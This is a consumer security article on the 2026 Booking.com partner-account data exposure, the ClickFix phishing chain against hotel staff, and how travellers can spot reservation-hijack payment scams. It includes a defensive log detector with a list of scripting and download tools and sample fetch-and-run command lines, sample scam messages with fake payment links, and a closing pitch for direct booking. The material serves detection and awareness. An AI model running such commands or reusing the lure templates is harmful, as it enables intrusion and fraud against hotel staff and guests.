Olbia city centre at night. Photo: RENTAL12
On 13 April 2026, Booking.com notified customers that attackers accessed reservation data—names, emails, phone numbers, booking details—through compromised hotel-partner accounts. The stolen data fuels “reservation hijack” scams: WhatsApp or SMS messages quoting your exact booking and demanding urgent payment. Booking.com says its own systems were not breached; financial data was not accessed. Protect yourself by keeping all communication and payment inside the official app, or book direct with a verified operator.
Quick answer: On 13 April 2026, Booking.com emailed customers that “unauthorised third parties” had accessed reservation data—names, emails, phone numbers, booking details—through compromised hotel-partner accounts. No financial data was taken. Reservation PINs were reset.
The emails, reported by Skift, TechCrunch, and The Guardian, confirmed that attackers accessed guest names, email addresses, phone numbers, booking details (property name, stay dates, confirmation reference), and any messages guests had shared with the property. Financial and payment data were not accessed, and Booking.com states its own backend infrastructure was not breached—the exposure came from hotel-partner accounts.
This is not new. The same pattern traces back to December 2018 (4,109 customers exposed via a UAE hotel vishing scam; Dutch DPA fine of €475,000 for late reporting). It accelerated through 2023—the Eurovision WhatsApp scam wave, UK Action Fraud logging 532 reports and £370,000 in losses—and into 2025–2026 with Microsoft’s Storm-1865/ClickFix report and Sekoia’s “I Paid Twice” campaign. As recently as 23 May 2026, Japanese hotel operator Polaris Holdings detected ¥9 million diverted via tampered payout bank details on its Booking.com group account.
“Booking.com will never ask guests to share credit card details by email, over the phone, WhatsApp or text, or ask guests to make a bank transfer that is different from the payment policy details in their booking confirmation.” — Booking.com Trust & Safety policy (verified May 2026)
Quick answer: The stolen fields—your name, hotel, dates, confirmation number—are exactly the “shared secrets” you assume only you and the hotel know. A scam message quoting them bypasses ordinary scepticism because it feels like customer service, not fraud.
A stolen password still has to defeat two-factor authentication. Stolen booking data needs nothing except a WhatsApp message to a guest already expecting to hear from the hotel. Gen Digital’s March 2026 “Reservation Hijack Scam” analysis identified two lure tiers: high-context lures that name the guest, cite exact stay dates, and pre-fill a fake payment page with real data; and low-context lures that rely on hotel branding and urgency alone. The most dangerous variant injects the scam into the genuine Booking.com chat thread—the guest sees it alongside legitimate check-in instructions from the same sender.
“The fraud pipeline is faster than the disclosure process”—in some documented cases, scam messages reached guests before the breach notification did. — Constella Intelligence analysis, 17 April 2026
Reports differ on whether postal addresses were also exposed; Booking.com told TechCrunch that physical addresses were not accessed. The number of customers affected has not been disclosed.
Quick answer: Attackers phish hotel staff with fake Booking.com “guest complaint” emails, trick them into running malware via a fake CAPTCHA (the “ClickFix” technique), steal extranet credentials, read real reservations, then contact guests with scam payment requests using the stolen booking details.
Microsoft tracks the primary threat actor as Storm-1865—a financially motivated group operating across North America, Oceania, South and Southeast Asia, and Europe since early 2023.
The attack runs in three stages. Stage 1: a phishing email hits the hotel’s reservations desk posing as a Booking.com “Partner” message—typically a fake guest complaint needing urgent response. Stage 2: the link leads to a counterfeit CAPTCHA that tricks the employee into pressing Win+R, Ctrl+V, Enter—secretly executing a command that downloads info-stealer malware. Because the employee runs the command themselves, it looks authorised to security tools. Stage 3: the malware harvests extranet credentials, the attacker reads real reservation data, then contacts guests with scam payment requests.
Different research teams documented different payloads: Microsoft identified XWorm, VenomRAT, and others via mshta.exe; Sekoia’s “I Paid Twice” report found PureRAT via PowerShell; Bridewell described a distinct credential-harvesting path using Evilginx and homograph “bookling” domains.
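As an added defender-side illustration of the Stage 2 mechanism described above (example code written for this page, not code from Microsoft, Sekoia, Bridewell or any other source cited): the Run dialog opened with Win+R is hosted by explorer.exe, so a pasted ClickFix command shows up in endpoint telemetry as explorer.exe spawning a scripting or download binary (mshta.exe in Microsoft's report, PowerShell in Sekoia's) with a URL or an encoded, hidden-window invocation. The script parses constructed, simplified Sysmon-style process-creation lines and flags that parent/child/argument combination. The log layout, the file paths and the `example.invalid` host are assumptions made up for the example; none of the sample lines is a real payload.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events in a simplified Sysmon Event ID 1
# layout (key=value fields separated by "|"). Paths, hosts and arguments are
# assumptions made up for this example; "example.invalid" is a reserved TLD.
SAMPLE_EVENTS = r"""
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://example.invalid/placeholder-page
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -enc QUJD
ParentImage=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -File C:\Scripts\backup.ps1
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad reservations.txt
"""

# Binaries a ClickFix lure typically has the victim paste into the Run dialog.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
           "certutil.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}

# Arguments that mean "fetch and run something": a URL, an encoded or hidden
# PowerShell invocation, or in-memory execution helpers.
SUSPICIOUS_ARGS = re.compile(
    r"(https?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|"
    r"invoke-expression|downloadstring)",
    re.IGNORECASE,
)


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Split one 'k=v|k=v' line into a dict; return None for blank lines."""
    line = line.strip()
    if not line:
        return None
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_candidate(event: Dict[str, str]) -> bool:
    """The Run dialog (Win+R) is hosted by explorer.exe, so a pasted ClickFix
    command appears as explorer.exe spawning a scripting/download binary with
    fetch-and-run arguments. The rule is deliberately narrow: a PowerShell
    started by a mail client (sample line 3) is a different pattern."""
    return (
        basename(event.get("ParentImage", "")) == "explorer.exe"
        and basename(event.get("Image", "")) in LOLBINS
        and SUSPICIOUS_ARGS.search(event.get("CommandLine", "")) is not None
    )


def scan(log_text: str) -> List[str]:
    """Return the command lines of all events matching the ClickFix pattern."""
    hits = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event and is_clickfix_candidate(event):
            hits.append(event["CommandLine"])
    return hits


if __name__ == "__main__":
    for cmd in scan(SAMPLE_EVENTS):
        print("ClickFix candidate:", cmd)
```

On the sample data the first two lines are flagged (mshta with a URL; hidden, encoded PowerShell) and the last two are not. Because the victim pastes the command into the Run dialog, the same string is also written to the user's RunMRU registry history (`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`), which is a useful confirming artefact when triaging a hotel workstation after the fact.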
AZULIS Apartments, Olbia: owner-operated, direct booking available. Photo: RENTAL12
Quick answer: A 24–48 hour cancellation threat, a request to pay or “verify your card” outside the official platform, and a channel jump from in-app to WhatsApp or SMS—these are the three signature red flags, even when the message quotes your exact booking details.
| Signal | Legitimate hotel message | Reservation hijack scam |
|---|---|---|
| Payment method | Matches your original confirmation | New link, bank transfer, or “verify card” |
| Urgency | Standard check-in timeline | “Pay within 24–48h or booking cancelled” |
| Channel | In-app messaging or confirmation email | Jumps to WhatsApp, SMS, or external email |
| Booking details | Correct (hotel has them) | Also correct (stolen from the same source)—not proof of legitimacy |
| Card re-entry | Never asked outside checkout | “Re-enter card for security” |
| Sender | Official Booking.com thread | May also be inside the official thread (compromised account) |
Sources: Gen Digital (Mar 2026), Booking.com Trust & Safety, Norton (Mar 2026), Microsoft (Mar 2025)
The critical insight from this table: correct booking details are not proof of legitimacy. Both the real hotel and the attacker have the same data. The only reliable signals are the payment method, the urgency, and the channel.
Quick answer: Keep all communication and payment inside the official app. Never re-enter card details for “verification.” Contact the property using your original confirmation’s contact details, not the message’s. Or remove the partner-account attack surface entirely by booking direct with verified operators.
These rules apply on any booking platform:
- Re-open the booking yourself—type the URL or open the app. Check status there, not through any link.
- Use the phone number or email from your original confirmation or the property’s official website—never from the suspicious message.
- Change your password (unique, not reused), enable 2FA or a passkey, and watch for credential stuffing against your email account.
- Call your bank immediately. Cancel or freeze the card. Enable transaction alerts. Watch for follow-on charges—stolen cards are tested with small amounts first.
Booking direct with an operator whose payment chain you can verify removes the partner-account attack surface entirely—no extranet credential to steal, no reservation thread to hijack.
31 May 2026 — Initial publication. Sources: Microsoft Security Blog (Mar 2025), Gen Digital/Norton (Mar 2026), Skift/TechCrunch/The Guardian (Apr 2026), Sekoia “I Paid Twice” (Nov 2025), Bridewell BR-UNC-030 (Feb 2026), Constella (Apr 2026), Polaris Holdings/TRAICY (May 2026), Booking.com Trust & Safety (verified May 2026). Fact-checked against 30+ primary sources; conflicts flagged per editorial policy.
Was Booking.com itself hacked in April 2026 or were hotel partner accounts compromised?
Booking.com states its own backend systems and infrastructure were not breached. The April 2026 data exposure stems from compromised hotel-partner extranet accounts, a pattern consistent with incidents documented since 2018, including the Secureworks Vidar investigation of October 2023 and Microsoft's Storm-1865 ClickFix campaign tracked from December 2024.
The attacker enters through the hotel’s admin panel, not Booking.com’s central infrastructure. Independent investigations by Secureworks (October 2023) and Microsoft (March 2025) support this characterisation.
What personal data was exposed in the Booking.com breach of April 2026?
Booking.com confirmed that names, email addresses, phone numbers, booking details (property name, stay dates, confirmation reference) and any free-text messages shared with the accommodation were accessed; financial and payment data were not accessed according to Booking.com's April 2026 statement to The Guardian.
Reports differ on whether postal addresses were also accessed; Booking.com states they were not. Even without financial data, the exposed information is enough to construct highly convincing scam messages that quote your exact booking.
How can travellers tell whether a hotel payment request is real or a reservation hijack scam?
Legitimate hotels never ask guests to re-enter card details for verification, never demand payment via WhatsApp or bank transfer, and never impose a 24–48 hour cancellation deadline that is not shown in the original confirmation. Any message doing so, even one that quotes correct booking details or appears inside the genuine platform chat thread, should be treated as a scam and verified by contacting the property directly using the details from your original confirmation.
Check three things: payment method (does it match your confirmation?), urgency (24–48h deadline?), and channel (did the conversation jump to WhatsApp/SMS?). Correct booking details are not proof—both the hotel and the attacker have them.
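The red-flag table earlier on the page and the three-point check in this answer describe the same decision rule, so here is one added example that implements it (example code written for this page, not a tool from Booking.com, Gen Digital or any other source cited). It scores a guest message on the signals the page names, payment method, urgency and channel, and deliberately ignores whether the booking details are correct, because the attacker has the same data. The three sample messages, the guest and hotel names, the confirmation number and the `example.invalid` links are all constructed for the example; the assumption that the platform's own links end in `booking.com` is also the example's, not a statement from the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import urlparse


@dataclass
class Message:
    channel: str                  # "app", "email", "whatsapp" or "sms"
    text: str
    quotes_correct_booking: bool  # deliberately NOT used by the scorer


# Signals from the red-flag table. Patterns are illustrative, not exhaustive.
URGENCY = re.compile(r"\b(?:within|in)\s+(?:24|48)\s*(?:h|hours?)\b|\bcancel(?:led|lation)?\b", re.I)
CARD_REENTRY = re.compile(r"\b(?:verify|confirm|re-?enter|update)\s+(?:your\s+)?(?:card|payment|credit)", re.I)
TRANSFER = re.compile(r"\b(?:bank transfer|iban|wire)\b", re.I)
PAYMENT_WORDS = re.compile(r"\b(?:pay|payment|card|deposit|charge)\b", re.I)
URL = re.compile(r"https?://[^\s<>\"']+", re.I)

# Assumption for this example: the platform's own hosts are booking.com or its subdomains.
PLATFORM_DOMAIN = "booking.com"


def external_links(text: str) -> List[str]:
    """URLs whose host is not the platform itself (look-alike hosts count as external)."""
    found = []
    for url in URL.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host != PLATFORM_DOMAIN and not host.endswith("." + PLATFORM_DOMAIN):
            found.append(url)
    return found


def assess(msg: Message) -> Dict[str, object]:
    """Payment-related flags alone make a message a scam; context flags alone
    mean: verify through the contact details in your original confirmation."""
    payment_flags: List[str] = []
    context_flags: List[str] = []
    if CARD_REENTRY.search(msg.text):
        payment_flags.append("asks to re-enter or verify card details")
    if TRANSFER.search(msg.text):
        payment_flags.append("asks for a bank transfer / IBAN")
    for url in external_links(msg.text):
        if PAYMENT_WORDS.search(msg.text):
            payment_flags.append(f"external payment link: {url}")
        else:
            context_flags.append(f"external link: {url}")
    if msg.channel in ("whatsapp", "sms"):
        context_flags.append(f"channel jump to {msg.channel}")
    if URGENCY.search(msg.text):
        context_flags.append("artificial deadline or cancellation threat")
    # Correct booking details are NOT evidence either way: the attacker has them too,
    # so msg.quotes_correct_booking is intentionally never consulted.
    if payment_flags:
        verdict = "scam"
    elif context_flags:
        verdict = "verify"
    else:
        verdict = "ok"
    return {"verdict": verdict, "reasons": payment_flags + context_flags}


# Constructed sample messages (names, numbers and hosts are made up).
LEGIT = Message("app", "Your check-in time is from 15:00 on 3 June. "
                "Your self check-in code will be sent on the morning of arrival.", True)
HIJACK = Message("whatsapp", "Hello John, your booking 1234.567.890 at Hotel Example (3-5 June) "
                 "must be verified within 24 hours or it will be cancelled. "
                 "Please confirm your card here: https://booking-verify.example.invalid/pay", True)
IN_THREAD = Message("app", "Due to a system update, please re-enter your card details at "
                    "http://secure-booking.example.invalid to keep your reservation", True)

if __name__ == "__main__":
    for m in (LEGIT, HIJACK, IN_THREAD):
        print(m.channel, assess(m))
```

The third sample matters most: it arrives inside the official thread (a compromised partner account, as the page describes) and still scores as a scam, because the verdict rests on what the message asks for, not on where it came from or how much it knows about your stay.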
Is it safer to book hotels directly rather than through Booking.com after the 2026 breach?
Booking direct with an operator whose payment chain you can verify (encrypted processor, no private IBANs, published physical address) removes the partner-account attack surface entirely; on OTA platforms, keep all communication and payment inside the official app and never follow links to external payment pages regardless of how accurate the booking details appear.
Both can be safe. On OTAs, keep everything on-platform. Booking direct with a verified operator removes the extranet vulnerability entirely. Either way: never pay outside the official channel, never re-enter card details because a message told you to.
Payment through Stripe/Lodgify (PCI Level 1). No private IBANs. No intermediaries. €10,000 Payment Integrity Guarantee backed by owner-held reserves.